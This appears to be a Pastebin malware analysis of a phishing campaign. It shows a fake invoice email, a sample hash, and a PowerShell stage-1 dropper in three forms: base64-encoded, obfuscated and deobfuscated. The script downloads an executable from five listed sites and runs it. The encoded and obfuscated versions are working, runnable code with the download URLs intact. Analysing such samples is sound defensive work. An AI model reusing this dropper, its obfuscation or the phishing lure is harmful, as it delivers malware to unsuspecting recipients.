Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Phishing Email
- Hi [recipient],
- I’ve tried to call you but couldn’t get thought. Need to know the status of this invoice I’ve sent to you a while ago. provided a copy below.
- http://advancedalternatives[dot]co.th/Invoice-number-154082/
- Best Regards,
- [fake sender name]
- # Linked Payload
- Stage 1 payload is a .doc file which executes the powershell below.
- SHA256: f13e2c5ae7e3f949a575856fb0b5d285eae746c7b77cf6272a6e11e99fcec9e6
- Stage 2 payload downloaded from the URLs found in the deobfuscated section below. Haven't analyzed yet.
- # Original Stage 1 Payload
- JAB7AFcAYABzAEMAcgBgAEkAUAB0AH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAG4AZQB3AC0AbwAnACwAJwB0ACcALAAnAGIAagBlAGMAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbABsACcALAAnAGUAJwAsACcAVwBTAGMAcgBpAHAAdAAuAFMAJwAsACcAaAAnACkAOwAkAHsAVwBFAGAAQgBgAGMAYABMAEkARQBOAFQAfQAgAD0AIAAuACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBlACcALAAnAGMAdAAnACwAJwBuAGUAdwAtAG8AYgBqACcAKQAgACgAIgB7ADIAfQB7ADUAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADMAfQB7ADYAfQAiAC0AZgAnAFcAZQBiAEMAbABpACcALAAnAC4AJwAsACcAUwB5AHMAdAAnACwAJwBlACcALAAnAE4AZQB0AC4AJwAsACcAZQBtACcALAAnAG4AdAAnACkAOwAkAHsAUgBBAG4AYABEAGAATwBNAH0AIAA9ACAAJgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAHcALQBvACcALAAnAG4AZQAnACwAJwBiAGoAZQBjAHQAJwApACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBtACcALAAnAHIAYQBuAGQAbwAnACkAOwAkAHsAVQByAGAAbABzAH0AIAA9ACAAKAAiAHsAMQA0AH0AewAyADAAfQB7ADEAOQB9AHsAMQAzAH0AewAwAH0AewAxADcAfQB7ADMAfQB7ADIAMwB9AHsANAB9AHsANwB9AHsAMQA4AH0AewA1AH0AewAxADUAfQB7ADIAOQB9AHsAOQB9AHsANgB9AHsAMwAwAH0AewAyAH0AewAyADEAfQB7ADEAMQB9AHsAMQB9AHsAMgA4AH0AewAyADYAfQB7ADEAMgB9AHsAOAB9AHsAMgA3AH0AewAyADQAfQB7ADEANgB9AHsAMgAyAH0AewAxADAAfQB7ADIANQB9ACIAIAAtAGYAJwBxAG4AaAAnACwAJwBJAG4AVgBUAC8ALAAnACwAJwAvAHoAcgAnACwAJwB0ACcALAAnAC8ALwB3ACcALAAnAGkAZwBuAC4AYwBvAG0ALgBhAHUALwAnACwAJwB0AGkAdgBlAGkAdAAnACwAJwBpACcALAAnAHIAdABzACcALAAnAGUAYwAnACwAJwB3AEoAJwAsACcARwAnACwAJwBvACcALAAnAC8AbwBoAGwAZQByAG8AbgBsAGkAbgBlAC4AYwBvAG0ALwAnACwAJwBoACcALAAnAEUAbQBPAFkAegBjAGkAJwAsACcAeQBvAGYAJwAsACcAdgBxAEwAZQBHAGQAcwAvACwAaAAnACwAJwBsAHMAbwBuAGQAZQBzACcALAAnAHAAOgAvACcALAAnAHQAdAAnACwAJwBNACcALAAnAGQAYQBsAGwAYQBzAC4AYwBvAG0ALwBGACcALAAnAHQAcAA6ACcALAAnAG8AbQAuAGIAcgAvAEEARQBWAEgAVgAvACwAaAB0AHQAcAA6AC8ALwBuAHUAYgBvAGQAJwAsACcAUwBnAHYAUABLAEYALwAnACwAJwA6AC8ALwBwACcALAAnAGUAdgBlAG4ALgBjACcALAAnAGgAdAB0AHAAJwAsACcAWABOAC8ALABoAHQAdABwADoALwAvAGUAZgBmACcALAAnAC4AYwBvAG0ALgBhAHUAJwApAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAAnACwAJwBTAHAAbABpACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBOAGAAQQBNAGUAfQAgAD0AIAAkAHsAUgBgAEEAYABOAGQATwBNAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAG4AJwAsACcAZQB4AHQAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGEAYABUAGgAfQAgAD0AIAAkAHsAZQBgAE4AVgA6AGAAVABlAG0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAEEAYABtAGUAfQAgACsAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAC4AJwAsACcAZQB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAewBVAGAAUgBsAH0AIABpAG4AIAAkAHsAVQByAGAATABzAH0AKQB7AHQAcgB5AHsAJAB7AHcAZQBgAEIAQwBMAGAAaQBgAGUAbgB0AH0ALgAoACIAewAwAH0AewAxAH0AewAzAH0AewAyAH0AIgAtAGYAJwBEACcALAAnAG8AdwBuAGwAJwAsACcAYQBkAEYAaQBsAGUAJwAsACcAbwAnACkALgBJAG4AdgBvAGsAZQAoACQAewBVAGAAUgBMAH0ALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAbgBnACcALAAnAFQAbwBTAHQAcgBpACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYQBgAFQASAB9ACkAOwAmACgAIgB7ADMAfQB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACcAdAAtAFAAcgAnACwAJwBvAGMAJwAsACcAZQBzAHMAJwAsACcAUwB0AGEAcgAnACkAIAAkAHsAcABgAEEAdABIAH0AOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7ACYAKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIALQBmACcAdwAnACwAJwBoAG8AcwB0ACcALAAnAHIAaQB0ACcALAAnAGUALQAnACkAIAAkAHsAXwB9AC4AIgBFAGAAWABjAGUAcABUAGAAaQBvAG4AIgAuACIATQBFAHMAUwBgAEEAYABHAEUAIgA7AH0AfQANAAoA
- # Decoded
- ${W`sCr`IPt} = .("{0}{2}{1}" -f'new-o','t','bjec') -ComObject ("{2}{3}{1}{0}"-f 'll','e','WScript.S','h');
- ${WE`B`c`LIENT} = .("{2}{0}{1}" -f 'e','ct','new-obj') ("{2}{5}{1}{4}{0}{3}{6}"-f'WebCli','.','Syst','e','Net.','em','nt');
- ${RAn`D`OM} = &("{1}{0}{2}"-f 'w-o','ne','bject') ("{1}{0}" -f'm','rando');
- ${Ur`ls} = ("{14}{20}{19}{13}{0}{17}{3}{23}{4}{7}{18}{5}{15}{29}{9}{6}{30}{2}{21}{11}{1}{28}{26}{12}{8}{27}{24}{16}{22}{10}{25}" -f'qnh','InVT/,','/zr','t','//w','ign.com.au/','tiveit','i','rts','ec','wJ','G','o','/ohleronline.com/','h','EmOYzci','yof','vqLeGds/,h','lsondes','p:/','tt','M','dallas.com/F','tp:','om.br/AEVHV/,http://nubod','SgvPKF/','://p','even.c','http','XN/,http://eff','.com.au').("{1}{0}"-f't','Spli').Invoke(',');
- ${N`AMe} = ${R`A`NdOM}.("{0}{1}"-f 'n','ext').Invoke(1, 65536);
- ${Pa`Th} = ${e`NV:`TemP} + '\' + ${NA`me} + ("{0}{1}" -f'.','exe');
- foreach(${U`Rl} in ${Ur`Ls}){try{${we`BCL`i`ent}.("{0}{1}{3}{2}"-f'D','ownl','adFile','o').Invoke(${U`RL}.("{1}{0}" -f 'ng','ToStri').Invoke(), ${Pa`TH});
- &("{3}{0}{1}{2}" -f't-Pr','oc','ess','Star') ${p`AtH};
- break;
- }catch{&("{0}{2}{3}{1}"-f'w','host','rit','e-') ${_}."E`XcepT`ion"."MEsS`A`GE";
- }}
- # Deobfuscated
- $WScript = New-Object -ComObject WScript.Shell;
- $WebClient = New-Object System.Net.WebClient;
- $Random = New-Object random;
- $Urls = {"http://ohleronline[dot]com/qnhvqLeGds/",
- "http://wilsondesign[dot]com.au/EmOYzciXN/",
- "http://effectiveit[dot]com.au/zrMGInVT/",
- "http://portseven[dot]com.br/AEVHV/",
- "http://nubodyofdallas[dot]com/FwJSgvPKF/"
- };
- $Name = $Random.Next.Invoke(1, 65536);
- $Path = $EnvTemp + '\' + $Name + '.exe';
- foreach($Url in $Urls) {
- try {
- $WebClient.DownloadFile.Invoke($Url.ToString.Invoke(), $Path);
- Start-Process $Path;
- Break;
- } catch {
- Write-Host $Exception.Message;
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement